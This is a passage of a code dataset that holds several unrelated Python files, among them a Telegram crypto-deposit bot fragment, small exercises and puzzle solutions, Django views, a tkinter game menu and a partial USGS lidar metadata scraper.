state.update_data({\"dep_msg\": dep_msg.message_id})\n elif int(msg.text) < 1000:\n text = await users.get_text(\"Стабпул ошибка #3\", language[4])\n dep_msg = await msg.answer(text)\n await state.update_data({\"dep_msg\": dep_msg.message_id})\n else:\n text = await users.get_text(\"Ошибка пополнения #3\", language[4])\n await msg.answer(text)\n\n\nasync def smalluser_step2(call: types.CallbackQuery, state: FSMContext):\n await call.message.delete()\n async with state.proxy() as data:\n data['currency'] = call.data\n crypto_dict = {\n 'BTC_BITCOIN': 'Bitcoin',\n 'ETH_ETHEREUM': 'Ethereum',\n 'USDT_TRON': 'USDT TRC20',\n 'USDT_ETHEREUM': 'USDT ERC20',\n 'TRX_TRON': 'Tron',\n 'LTC_LITECOIN': 'Litecoin',\n 'BNB_BSC': 'Binance Coin',\n 'BUSD_BSC': 'Binance USD'\n }\n currency_str = crypto_dict[data.get('currency')]\n language = await users.user_data(call.from_user.id)\n wallet = await thedex.pay_invoice(data.get('currency'), data.get('invoiceId'))\n count = wallet[1]\n if \".\" in count:\n count = count.replace(\".\", \",\")\n text = f\"Отправьте `{count}` {currency_str} на указанный адрес:\\n\\n`{wallet[0]}`\\n\\n\" \\\n f\"Перед совершением транзакции внимательно проверьте адрес получателя и сумму перевода, оба значения \" \\\n f\"должны совпадать со значениями в сообщении\" \\\n f\"\\n\\n*Срок действия кошелька для пополнения \\- 60 минут, \" \\\n f\"если вы не успеваете пополнить за это время отмените транзакцию\\!*\"\n if language[4] == \"EN\":\n text = f\"Please send {count} {currency_str} to the provided address:\\n\\n{wallet[0]}\\n\\n\" \\\n f\"Before making the transaction, carefully verify the recipient's address and the transfer amount.\" \\\n f\" Both values should match the ones in the message.\"\n await call.message.answer(text, reply_markup=inline.finish_transaction(language[4]),\n parse_mode=types.ParseMode.MARKDOWN_V2)\n await DemoStabPoolUser.next()\n\n\nasync def smalluser_finish(call: types.CallbackQuery, state: FSMContext):\n language = await users.user_data(call.from_user.id)\n await call.message.delete()\n async with state.proxy() as data:\n text = await users.get_text(\"Статус Successful (thedex)\", language[4])\n await dm_database.insert_deposit(call.from_user.id, data.get(\"amount\"))\n await dm_database.insert_demo_balance_history(\n call.from_user.id, data.get(\"amount\"), \"IN\", data.get('invoiceId'))\n await state.finish()\n await call.message.answer(text, reply_markup=await dm_inline.dm_main_menu(language[4]))\n\n\ndef register(dp: Dispatcher):\n dp.register_callback_query_handler(registration_500, text='dm_stabpool')\n dp.register_message_handler(smalluser_step1, state=DemoStabPoolUser.amount)\n dp.register_callback_query_handler(back_menu, state=DemoStabPoolUser.amount)\n dp.register_callback_query_handler(smalluser_step2, state=DemoStabPoolUser.currency)\n dp.register_callback_query_handler(smalluser_finish, state=DemoStabPoolUser.finish)\n","repo_name":"west3n/j2mbot","sub_path":"demo/dm_refill_stabpool.py","file_name":"dm_refill_stabpool.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36075704066","text":"from tensorflow.python.keras.models import load_model\nimport numpy as np\nimport os\nfrom tensorflow.python.keras.preprocessing import image\n\nimport constants as constant\nimport utils\n\n\nclass StaticTestModel:\n def __init__(self, model_filename):\n self.model_filename = model_filename\n self.classifier = load_model(constant.MODEL_METRICS_DIRECTORY + model_filename)\n\n def predict(self, image_path):\n test_image = image.load_img(image_path, grayscale=True)\n test_image = image.img_to_array(test_image)\n test_image = np.expand_dims(test_image, axis=0)\n result = self.classifier.predict(test_image)\n current_result = utils.get_letter_based_on_prediction(result)\n return utils.get_correct_character_for_special_characters(current_result)\n\n def test_model_with_alphabet(self, images_format='.JPG'):\n global_correct_classification_count = 0\n global_total_examples_count = 0\n for subdir, dirs, files in os.walk(constant.TEST_DATA_DIRECTORY):\n split_list = subdir.split('TestData/')\n actual_letter = split_list[1]\n print(actual_letter)\n correct_classification_count = 0\n total_examples_count = 0\n\n if files:\n for file in files:\n image_path = os.path.join(subdir, file)\n predicted_letter = self.predict(image_path)\n total_examples_count += 1\n\n if actual_letter == predicted_letter:\n correct_classification_count += 1\n\n print('Correctly classified: ' + str(correct_classification_count))\n acc = correct_classification_count / total_examples_count\n global_correct_classification_count += correct_classification_count\n global_total_examples_count += total_examples_count\n print('Accuracy: ' + str(acc))\n\n print('Global correctly classified: ' + str(global_correct_classification_count) + \"/\" + str(\n global_total_examples_count))\n global_acc = global_correct_classification_count / global_total_examples_count\n print('Global accuracy: ' + str(global_acc))\n\n\n# test_model_A = StaticTestModel('model_saved_2019-06-18.h5')\ntest_model = StaticTestModel('model_saved_2019-06-20.h5')\ntest_model.test_model_with_alphabet()\n","repo_name":"Deeathex/RealTimeSignLanguageRecognition","sub_path":"static_test_model.py","file_name":"static_test_model.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70272960142","text":"# -*- coding: utf-8 -*-\n\n'''\nhacker cup C問題\nメモ化再帰\n\nCreated on 2012/01/29\n\n@author: y42sora\n'''\n \ndef check(string):\n global dic\n global max_num\n \n if string in dic:\n return dic[string]\n \n if len(string) == 0:\n return 1\n\n if string[0] == '0':\n return 0\n \n if int(string) <= max_num:\n return 1\n else:\n return 0\n\nfile = open('in.txt', 'r')\nt = int(file.readline())\n\nout = open('out.txt', 'w')\n\nfor x in range(t):\n line = file.readline()\n s = line.split(\" \")\n max_num = int(s[0])\n \n if len(s) == 1:\n s = file.readline().rstrip()\n else:\n s = s[1].rstrip()\n \n ans = 1\n \n for string in s.split(\" \"):\n dic = dict([])\n dic[''] = 1\n \n dic[string[0:1]] = check(string[0:1])\n dic[string[1:2]] = check(string[1:2])\n dic[string[0:2]] = check(string[0:2]) + dic[string[0:1]] * dic[string[1:2]]\n \n for i in range(3, len(string)+1):\n num = 0\n num += dic[string[0:i-1]] * check(string[i-1:i])\n num += dic[string[0:i-2]] * check(string[i-2:i])\n num += dic[string[0:i-3]] * check(string[i-3:i])\n dic[string[0:i]] = num\n \n ans *= dic[string] \n \n out.write(\"Case #%d: %d\\n\" % ((x+1),ans))\n \nout.close()\n","repo_name":"y42sora/soraSource","sub_path":"Algorithm/Facebook Hacker Cup/2012/Round 1/Squished Status.py","file_name":"Squished Status.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5061373423","text":"import os\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nfrom turtle import left\r\ndef easycountries():\r\n os.startfile(r'countries_easy.py')\r\n level.destroy()\r\ndef mediumcountries():\r\n os.startfile(r'countries_medium.py')\r\n level.destroy()\r\ndef hardcountries():\r\n os.startfile(r'countries_hard.py')\r\n level.destroy()\r\ndef easyinfo():\r\n messagebox.showinfo(\"easy rules\",\"You have 6 Chances to win the game othwise your man will be hanged\")\r\ndef mediuminfo():\r\n messagebox.showinfo(\"medium rules\",\"You have 5 Chances to win the game othwise your man will be hanged\")\r\ndef hardinfo():\r\n global b\r\n b+=1\r\n if(b<3):\r\n messagebox.showinfo(\"hard rules\",\"You have 4 Chances to win the game othwise your man will be hanged\")\r\n else:\r\n os.startfile(r'nightmare.py')\r\n level.destroy()\r\n\r\nlevel=Tk()\r\nlevel.title('LEVELS')\r\n\r\nlevel.geometry('300x350')\r\nlevel.resizable(False,False)\r\nb=0\r\nhead = Label(level, text =\"Choose the level\\nof difficulty.\",fg='#D0312D',bg='#C2DFFF',font=(\"arial\",30)).pack()\r\np1=PhotoImage(file=\"desc.png\")\r\nphoto1=PhotoImage(file = r\"easy.png\")\r\nphoto2=PhotoImage(file = r\"medium.png\")\r\nphoto3=PhotoImage(file = r\"hard.png\")\r\nButton(level, text = 'Easy', image = photo1,command=lambda:easycountries()).place(x=90,y=120)\r\nButton(level, text = 'Medium', image = photo2,command=lambda:mediumcountries()).place(x=80,y=200)\r\nButton(level, text = 'Hard', image = photo3,command=lambda:hardcountries()).place(x=90,y=280)\r\nButton(level,image=p1,command=lambda:easyinfo()).place(x=210,y=120)\r\nButton(level,image=p1,command=lambda:mediuminfo()).place(x=230,y=200)\r\nButton(level,image=p1,command=lambda:hardinfo()).place(x=213,y=280)\r\nlevel.config(bg='#C2DFFF')\r\nlevel.mainloop()\r\n","repo_name":"pravocodes/HANGMAN","sub_path":"python code/level_countries.py","file_name":"level_countries.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22085958402","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ndef results(metadata, labdata, cruxdata, verbose):\n if not verbose:\n return None\n\n print(metadata.get('time'))\n print('Lighthouse Version: {lighthouseVersion}'.format(\n lighthouseVersion = metadata.get('lighthouse_version')\n ))\n print()\n print('Score: {score:.0f} (LCP: {lcp:.1f} s; CLS: {cls:.3f}; FCP: {fcp:.1f} s; Speed Index: {speedIndex:.1f} s; TTI: {tti:.1f} s; TBT: {tbt} ms)'.format(\n score = labdata.get('score') * 100,\n lcp = labdata.get('lcp') / 1000,\n cls = labdata.get('cls') / 10,\n fcp = labdata.get('fcp') / 1000,\n speedIndex = labdata.get('speed_index') / 1000,\n tti = labdata.get('tti') / 1000,\n tbt = labdata.get('tbt')\n ))\n\n print()\n\n if (len(cruxdata) > 0):\n print('CrUX-Data')\n if ('crux_fcp' in cruxdata):\n print('FCP: {cruxFcp:.1f} s ({cruxFcpCat}) (Good {cruxFcpGood:.0f}% / Avg {cruxFcpAvg:.0f}% / Bad {cruxFcpBad:.0f}%)'.format(\n cruxFcp = cruxdata.get('crux_fcp') / 1000,\n cruxFcpCat = cruxdata.get('crux_fcp_category'),\n cruxFcpGood = cruxdata.get('crux_fcp_proportions_good') * 100,\n cruxFcpAvg = cruxdata.get('crux_fcp_proportions_average') * 100,\n cruxFcpBad = cruxdata.get('crux_fcp_proportions_bad') * 100\n ))\n\n if ('crux_lcp' in cruxdata):\n print('LCP: {cruxLcp:.1f} s ({cruxLcpCat}) (Good {cruxLcpGood:.0f}% / Avg {cruxLcpAvg:.0f}% / Bad {cruxLcpBad:.0f}%)'.format(\n cruxLcp = cruxdata.get('crux_lcp') / 1000,\n cruxLcpCat = cruxdata.get('crux_lcp_category'),\n cruxLcpGood = cruxdata.get('crux_lcp_proportions_good') * 100,\n cruxLcpAvg = cruxdata.get('crux_lcp_proportions_average') * 100,\n cruxLcpBad = cruxdata.get('crux_lcp_proportions_bad') * 100\n ))\n\n if ('crux_fid' in cruxdata):\n print('FID: {cruxFid} ms ({cruxFidCat}) (Good {cruxFidGood:.0f}% / Avg {cruxFidAvg:.0f}% / Bad {cruxFidBad:.0f}%)'.format(\n cruxFid = cruxdata.get('crux_fid'),\n cruxFidCat = cruxdata.get('crux_fid_category'),\n cruxFidGood = cruxdata.get('crux_fid_proportions_good') * 100,\n cruxFidAvg = cruxdata.get('crux_fid_proportions_average') * 100,\n cruxFidBad = cruxdata.get('crux_fid_proportions_bad') * 100\n ))\n\n if ('crux_cls' in cruxdata):\n print('CLS: {cruxCls:.3f} ({cruxClsCat}) (Good {cruxClsGood:.0f}% / Avg {cruxClsAvg:.0f}% / Bad {cruxClsBad:.0f}%)'.format(\n cruxCls = cruxdata.get('crux_cls') / 100,\n cruxClsCat = cruxdata.get('crux_cls_category'),\n cruxClsGood = cruxdata.get('crux_cls_proportions_good') * 100,\n cruxClsAvg = cruxdata.get('crux_cls_proportions_average') * 100,\n cruxClsBad = cruxdata.get('crux_cls_proportions_bad') * 100\n ))\n\n print()\n\ndef divider(verbose):\n if not verbose:\n return None\n\n print()\n _banner(40)\n print()\n\ndef _banner(length):\n border = '=' * length\n print(border)\n\ndef info(verbose, add_empty_lines, text, format=[]):\n if not verbose:\n return None\n\n print(text.format(*format))\n\n for l in range(0, add_empty_lines):\n print()","repo_name":"maczarr/pagespeed10x","sub_path":"pagespeed10x/print_out.py","file_name":"print_out.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"21929303422","text":"from dataclasses import dataclass, field\nfrom typing import List\n\nfrom aoc import get_lines\n\nTOTAL_SIZE = 70_000_000\n\nSIZE_NEEDED = 30_000_000\n\n\n@dataclass\nclass Node:\n name: str\n size: int = 0\n is_file: bool = False\n parent: 'Node' = None\n children: dict[str, 'Node'] = field(default_factory=dict)\n\n\ndef parse_input(lines):\n root = Node('/')\n cur_node = root\n for line in lines:\n tokenz = line.split()\n if line.startswith('$'):\n cur_node = parse_command(cur_node=cur_node, root=root, line=line, tokenz=tokenz)\n else:\n parse_ls_output(cur_node=cur_node, tokenz=tokenz)\n return root\n\n\ndef parse_ls_output(cur_node, tokenz):\n size_or_dir, name = tokenz[0], tokenz[1]\n if size_or_dir == 'dir' and name not in cur_node.children.keys():\n cur_node.children[name] = Node(name=name, parent=cur_node)\n elif name not in cur_node.children.keys():\n cur_node.children[name] = Node(name=name, size=int(size_or_dir), is_file=True, parent=cur_node)\n\n\ndef parse_command(cur_node: Node, root: Node, line: str, tokenz: List[str]) -> Node:\n if 'cd' in line:\n folder = tokenz[2]\n if folder == '..':\n return cur_node.parent\n if folder == '/':\n return root\n if folder not in cur_node.children.keys():\n cur_node.children[folder] = Node(folder)\n return cur_node.children[folder]\n if 'ls' in line:\n pass\n return cur_node\n\n\ndef calc_sum(node: Node, sizes: List[int]) -> (int, List[int]):\n if node.is_file:\n return node.size, sizes\n sizes.append(sum(calc_sum(child, sizes)[0] for child in node.children.values()))\n return sizes[-1], sizes\n\n\ndef part_1(sizes: List[int]) -> int:\n return sum(filter(lambda x: x < 100000, sizes))\n\n\ndef part_2(sizes: List[int], cur_used: int) -> int:\n needed = SIZE_NEEDED - (TOTAL_SIZE - cur_used)\n return min(filter(lambda x: x > needed, sizes))\n\n\ndef main():\n lines = get_lines(\"input_07.txt\")\n cur_used, sizes = calc_sum(parse_input(lines), [])\n print(\"Part 1:\", part_1(sizes)) # 1306611\n print(\"Part 2:\", part_2(sizes, cur_used)) # 13210366\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"weichslgartner/AdventOfCode2022","sub_path":"Python/day_07.py","file_name":"day_07.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"14297464073","text":"from django.shortcuts import render,redirect\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom notes.models import Note\r\nfrom notes.forms import NoteForm\r\n# Create your views here.\r\n\r\n@login_required\r\ndef note_list(request):\r\n notes = Note.objects.filter(created_by=request.user)\r\n return render(request, 'note_list.html', {'notes': notes})\r\n\r\n@login_required\r\ndef create_note(request):\r\n if request.method == 'POST':\r\n form = NoteForm(request.POST, request.FILES)\r\n if form.is_valid():\r\n note = form.save(commit=False)\r\n note.created_by = request.user\r\n note.save()\r\n form.save_m2m()\r\n return redirect('note_list')\r\n else:\r\n form = NoteForm()\r\n return render(request, 'create_note.html', {'form': form})","repo_name":"DandangiBalu/Note_storage_project","sub_path":"note_storage_project/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14598157799","text":"import time\n\nstart_time = time.time()\n\nf = open('names_1.txt', 'r')\nnames_1 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nf = open('names_2.txt', 'r')\nnames_2 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nduplicates = []\nnames_dict ={} # Return the list of duplicates in this data structure\n\n# Replace the nested for loops below with your improvements\nfor name_1 in names_1:\n names_dict[name_1] = True\nfor name_2 in names_2:\n if name_2 in names_dict:\n duplicates.append(name_2)\n\nend_time = time.time()\nprint (f\"{len(duplicates)} duplicates:\\n\\n{', '.join(duplicates)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n# ---------- Stretch Goal -----------\n# Python has built-in tools that allow for a very efficient approach to this problem\n# What's the best time you can accomplish? Thare are no restrictions on techniques or data\n# structures, but you may not import any additional libraries that you did not write yourself.\n","repo_name":"ValeriiaMur/Python-books-and-exercises","sub_path":"names/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"47"} +{"seq_id":"42303535645","text":"import subprocess\nimport re\nimport os\nimport sys\nimport random\nimport json\nfrom shapely.geometry import Polygon, Point\nfrom datetime import datetime\n\n# configure URL base to come from a CONFIG file\n# TODO: run a check on base URL to confirm that it is still viable\nurl_base = 'https://rockyweb.usgs.gov/vdelivery/Datasets/Staged/Elevation/LPC/Projects'\n\ndef downloads_dir_get(project_id):\n dir_path = 'projects/%s/_downloads' % (project_id)\n if not os.path.isdir(dir_path):\n os.makedirs(dir_path)\n return dir_path\n\ndef project_db_get(project_id, subproject_id):\n path = 'projects/%s/%s/data.json' % (project_id, subproject_id)\n data = {}\n if not os.path.isfile(path):\n f = open(path, 'w')\n f.write('{}')\n f.close()\n else:\n f = open(path)\n data = json.load(f)\n f.close()\n return data\n\ndef project_db_save(project_id, subproject_id, data):\n path = 'projects/%s/%s/data.json' % (project_id, subproject_id)\n f = open(path, 'w')\n charsWritten = f.write(json.dumps(data))\n f.close()\n return charsWritten > 0\n\ndef projects_get(is_return_json=False):\n index_dir = 'projects/_index'\n if not os.path.isdir(index_dir+'/backup'):\n os.makedirs(index_dir+'/backup', 0o774, True) # makde {projects_dir}/_index/backup, as that will auto-create _index/\n index_filename = '%s/index.json' % index_dir\n\n projects = None\n if not os.path.isfile(index_filename):\n projects = {'dateChecked': None, 'dateModified': None, 'data':{}}\n index_file = open(index_filename, 'w')\n json.dump(projects, index_file)\n index_file.close()\n else:\n jsonFile = open(index_filename, 'r')\n projects = json.load(jsonFile)\n jsonFile.close()\n\n projects_list_add_meta_data(projects['data'])\n\n return projects if not is_return_json else json.dumps(projects)\n\n\n\n\ndef projects_list_add_meta_data(projects, parent_dir=''):\n if not projects:\n return projects\n\n project_dirs_list = os.listdir('projects/%s' % parent_dir)\n for dir in project_dirs_list:\n if dir[0] == '.' or dir[0] == '_':\n continue\n projects[dir]['dateScraped'] = None\n project_meta_data_filepath = 'projects/%s%s/index.json' % (parent_dir+'/' if parent_dir else '', dir)\n if os.path.isfile(project_meta_data_filepath):\n project_meta_data_file = open(project_meta_data_filepath, 'r')\n project_meta_data = json.load(project_meta_data_file)\n projects[dir]['dateScraped'] = project_meta_data['dateScraped']\n return projects\n\n\n\ndef projects_list_compare(new_projects, old_projects):\n changes = {}\n for k in new_projects:\n if not k in old_projects:\n changes[k] = 'added on '+new_projects[k]['dateModified']\n new_projects[k]['isNew'] = True\n elif new_projects[k]['dateModified'] != old_projects[k]['dateModified']:\n new_projects[k]['oldDateModified'] = old_projects[k]['dateModified']\n changes[k] = 'was updated on %s' % new_projects[k]['dateModified']\n for k in old_projects:\n if not k in new_projects:\n changes[k] = 'removed'\n new_projects[k] = old_projects[k]\n new_projects[k]['isRemovedFromServer'] = True\n\n if len(changes.keys()) == 0:\n return None\n else:\n return changes\n\ndef projects_scrape(is_return_json=False):\n html_filepath = 'projects/_index/index.html'\n json_filepath = 'projects/_index/index.json'\n backup_dir = 'projects/_index/backup'\n# cmd = \"wget -S --quiet -t 1 -O %s %s \" % (html_filepath, url_base)\n# wget_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n# wget_process_out = str(wget_process.communicate()[0], 'utf-8')\n# if wget_process_out != None and wget_process_out != '':\n# status = 'success'\n# else:\n# status = 'failed'\n# # TODO: log miss\n\n file = open(html_filepath)\n file.seek(0)\n\n regex = re.compile(']+alt=\"\\[DIR\\]\">\\s*[^<]+\\s+(\\d{4}-\\d\\d-\\d\\d \\d\\d:\\d\\d)', re.IGNORECASE)\n # \"[DIR]\" WI_Statewide_2021_B21/ 2023-02-10 11:13 -\n\n projects_list_scraped = {}\n for line in file:\n match = regex.search(line)\n # project folders always contain an underscore or hyphen\n if match != None and ('_' in match.group(1) or '-' in match.group(1)):\n projects_list_scraped[match.group(1).replace('/', '')] = {'dateModified': match.group(2), 'dateScraped': None}\n\n file.close()\n\n projects = projects_get(False)\n projects['dataChanges'] = None\n\n changes = None\n if projects:\n changes = projects_list_compare(projects_list_scraped, projects['data'])\n if not changes:\n # add extra data for each project (from local dir meta)\n projects_list_add_meta_data(projects['data'])\n\n projects['dateChecked'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n return projects if not is_return_json else json.dumps(projects)\n else:\n # make a backup\n filepath_json_backup = '%s/%s__%d.json' % (\n backup_dir,\n datetime.now().strftime('%y_%m_%d_%H_%M_%S'),\n random.randint(1000,10000-1))\n backup_cmd = 'cp %s %s' % (json_filepath, filepath_json_backup)\n backup_process = subprocess.Popen(backup_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n backup_process_out = str(backup_process.communicate()[0], 'utf-8')\n\n\n json_file = open(json_filepath, 'w')\n projects = {\n \"dateModified\": datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n \"dateChecked\": datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n \"data\": projects_list_scraped,\n \"dataChanges\": changes\n }\n\n json_file.write(json.dumps(projects))\n json_file.close()\n\n # add extra data for each project (from local dir meta)\n # BUT DO NOT SAVE IT to global projects json\n projects_list_add_meta_data(projects['data'])\n\n return projects if not is_return_json else json.dumps(projects)\n\ndef subprojects_get(project_id, is_return_json=False):\n index_dir = 'projects/%s'\n if not os.path.isdir(index_dir+'/backup'):\n os.makedirs(index_dir+'/backup', 0o774, True) # makde {projects_dir}/_index/backup, as that will auto-create _index/\n index_filename = '%s/index.json' % index_dir\n\n projects = None\n if not os.path.isfile(index_filename):\n projects = {'dateChecked': None, 'dateModified': None, 'data':{}}\n index_file = open(index_filename, 'w')\n json.dump(projects, index_file)\n index_file.close()\n else:\n json_file = open(index_filename, 'r')\n projects = json.load(json_file)\n json_file.close()\n\n projects_list_add_meta_data(projects['data'])\n\n return projects if not is_return_json else json.dumps(projects)\n\n\n\n\ndef project_metadata_count(project_id):\n downloads_dir = downloads_dir_get(project_id)\n # grab all JSONs in the \"download\" folder for individual data file info\n cmd = \"ls %s/*.json | wc -l | cat\" % (downloads_dir)\n scrape_concat_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n scrape_concat_process_out = str(scrape_concat_process.communicate()[0], 'utf-8')\n return scrape_concat_process_out\n\n\ndef project_get(project_id, is_return_json=False):\n downloads_dir = downloads_dir_get(project_id)\n index_dir = 'projects/%s' % project_id\n if not os.path.isdir(index_dir):\n os.makedirs(index_dir)\n index_filename = 'projects/%s/index.json' % (project_id)\n project = {\"dateScraped\": None, \"subprojects\": None, \"hasMetadata\": False, \"isMetadataZipped\": False, \"hasLaz\": False, \"data\": None}\n\n if os.path.isfile(index_filename):\n index_file = open(index_filename, 'r')\n project = json.load(index_file)\n index_file.close()\n else:\n index_file = open(index_filename, 'w')\n json.dump(project, index_file)\n index_file.close()\n\n if not project['dateScraped']:\n return json.dumps(project) if is_return_json else project\n\n if project['subprojects']:\n for subproject_id in project['subprojects']:\n subproject_filename = 'projects/%s/%s/index.json' % (project_id, subproject_id)\n if os.path.isfile(subproject_filename):\n subproject_file = open(subproject_filename, 'r')\n subproject = json.load(subproject_file)\n project['subprojects'][subproject_id]['dateScraped'] = subproject['dateScraped']\n\n # grab all JSONs in the \"download\" folder for individual data file info\n cmd = \"cat %s/*.json 2>/dev/null\" % (downloads_dir)\n scrape_concat_process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n scrape_concat_process_out = str(scrape_concat_process.communicate()[0], 'utf-8')\n scraped_files_text = '[]'\n\n # place all files output in an array/list\n if scrape_concat_process_out != None and scrape_concat_process_out != '':\n scraped_files_text = '[%s]' % (scrape_concat_process_out.replace(\"}{\", \"},{\"))\n\n project_data_list = json.loads(scraped_files_text)\n project['data'] = {}\n for item in project_data_list:\n project['data'][item['name']] = item\n\n return json.dumps(project) if is_return_json else project\n\n\n\ndef project_scrape(project_id, is_return_json=False):\n project = project_get(project_id)\n project['dateScraped'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n project_data = project.pop('data') # do not save the data (that lives in separate files)\n\n downloads_dir = downloads_dir_get(project_id)\n index_filename = 'projects/%s/index.json' % (project_id)\n index_html_filename = downloads_dir + '/index.html'\n index_url = '%s/%s/' % (url_base, project_id)\n\n wget_status = wget_fetch(index_url, index_html_filename, 9)\n if wget_status != True:\n project['error'] = 'failed to fetch index of %s (%s): %s' % (project_id, index_url, wget_status)\n index_file = open(index_filename, 'w')\n json.dump(project, index_file)\n index_file.close()\n return json.dumps(project) if is_return_json else project\n\n regex_dir = re.compile(']+alt=\"\\[DIR\\]\">\\s*[^<]+\\s+(\\d{4}-\\d\\d-\\d\\d \\d\\d:\\d\\d)', re.IGNORECASE)\n\n index_html_file = open(index_html_filename, 'r')\n index_html_file.seek(0)\n\n dirs = {}\n for line in index_html_file:\n match_dir = regex_dir.search(line)\n if match_dir != None:\n dir = match_dir.group(1).replace('/', '')\n dirs[dir] = {'dateModified': match_dir.group(2)}\n\n if not 'metadata' in dirs:\n project['subprojects'] = dirs\n else:\n project['hasMetadata'] = True\n\n if 'laz' in dirs:\n project['hasLaz'] = True\n\n index_file = open(index_filename, 'w')\n json.dump(project, index_file)\n index_file.close()\n\n if project['hasMetadata']:\n project_data = project_metadata_index_scrape(project_id, project_data)\n\n project['data'] = project_data # still return the data which lives in separate files for each project file/tile\n return json.dumps(project) if is_return_json else project\n\ndef project_metadata_index_scrape(project_id, saved_project_data):\n downloads_dir = downloads_dir_get(project_id)\n\n index_filename = 'projects/%s/index.json' % (project_id)\n\n index_file = open(index_filename, 'r')\n project = json.load(index_file)\n index_file.close()\n\n index_html_filename = downloads_dir + '/meta_index.html'\n index_url = '%s/%s/metadata' % (url_base, project_id)\n\n wget_status = wget_fetch(index_url, index_html_filename, 9)\n if wget_status != True:\n project['error'] = 'failed to fetch meta-data index of %s (%s)' % (project_id, index_url)\n index_file = open(index_filename, 'w')\n json.dump(project, index_file)\n index_file.close()\n return project\n\n regex_file = re.compile(']+alt=\"\\[TXT\\]\">\\s*[^<]+\\s+(\\d{4}-\\d\\d-\\d\\d \\d\\d:\\d\\d)', re.IGNORECASE)\n regex_zip = re.compile(']+compressed.gif[^>]+>\\s*[^<]+\\s+(\\d{4}-\\d\\d-\\d\\d \\d\\d:\\d\\d)', re.IGNORECASE)\n\n index_html_file = open(index_html_filename, 'r')\n index_html_file.seek(0)\n\n project_data = {}\n for line in index_html_file:\n match_file = regex_file.search(line)\n match_zip = regex_zip.search(line)\n if match_file != None:\n meta_name = match_file.group(1).replace('.xml', '')\n # project has META DATA (not a zip file)\n project_data[meta_name] = {'dateModified': match_file.group(2)}\n elif match_zip != None:\n project['isMetadataZipped'] = True\n project['zippedData'] = {'file': match_zip.group(1), 'dateModified': match_zip.group(2)}\n\n\n # project has (META) DATA (not a zip file)\n if project_data.keys():\n for k in saved_project_data:\n if not k in project_data:\n saved_project_data[k]['isRemoved'] = True\n project_data[k] = saved_project_data[k]\n for k in project_data:\n if not k in saved_project_data:\n saved_project_data[k] = {'name': k, 'dateScraped': None }\n saved_project_data[k]['dateModified'] = project_data[k]['dateModified']\n project_data[k] = saved_project_data[k]\n\n file = open('%s/%s.json' % (downloads_dir, k), 'w')\n json.dump(project_data[k], file)\n\n index_html_file = open(index_filename, 'w')\n json.dump(project, index_html_file)\n index_file.close()\n\n return project_data\n\ndef metadata_files_fetch(project_id, limit=4):\n project = project_get(project_id)\n i = 0\n for meta_filename in project['data']:\n meta_meta = project['data'][meta_filename]\n if not meta_meta['dateScraped'] or meta_meta['scrapedStatus'] == 'failed' or meta_meta['dateScraped'] < meta_meta['dateModified']:\n status = metadata_file_fetch(project_id, meta_filename)\n if status == 'success':\n (bounds_polygon_coordinates, dates, projection, errors) = metadata_extract_data(project_id, meta_filename)\n meta_meta['bounds'] = bounds_polygon_coordinates\n meta_meta['dates'] = dates\n meta_meta['projection'] = projection\n meta_meta['errors'] = errors\n\n print('scraped %s %s' % (meta_filename, status))\n meta_meta['scrapedStatus'] = status\n meta_meta['dateScraped'] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n meta_filepath = '%s/%s.json' % (downloads_dir_get(project_id), meta_filename)\n meta_file = open(meta_filepath, 'w')\n json.dump(meta_meta, meta_file)\n meta_file.close()\n else:\n print('already scraped %s' % (meta_filename))\n\n i = i + 1\n\n # Testing\n if limit > 0 and i > limit:\n break\n\n return True\n\ndef metadata_file_fetch(project_id, filename):\n status = 'in progress'\n meta_url = '%s/%s/metadata/%s.xml' % (url_base, project_id, filename)\n dir_path = downloads_dir_get(project_id)\n download_filepath = '%s/%s.xml' % (dir_path, filename)\n\n wget_status = wget_fetch(meta_url, download_filepath, 9)\n return 'success' if wget_status == True else wget_status\n\ndef metadata_extract_data(project_id, filename):\n dir_path = downloads_dir_get(project_id)\n file_obj = open(dir_path + '/' + filename + ('.xml' if not '.xml' in filename else ''))\n file_obj.seek(0)\n\n date_seen = False\n date_extracted = False\n bounds_seen = False\n bounds_extracted = False\n\n dates = []\n bounds = {}\n projection = ''\n errors = {}\n\n for line in file_obj:\n if (not date_seen and not date_extracted) or line.find('') >= 0:\n date_seen = True\n\n if not date_extracted and line.find('') >=0:\n dates.append(line.replace('', '').replace('', '').strip())\n if not date_extracted and line.find('') >=0:\n 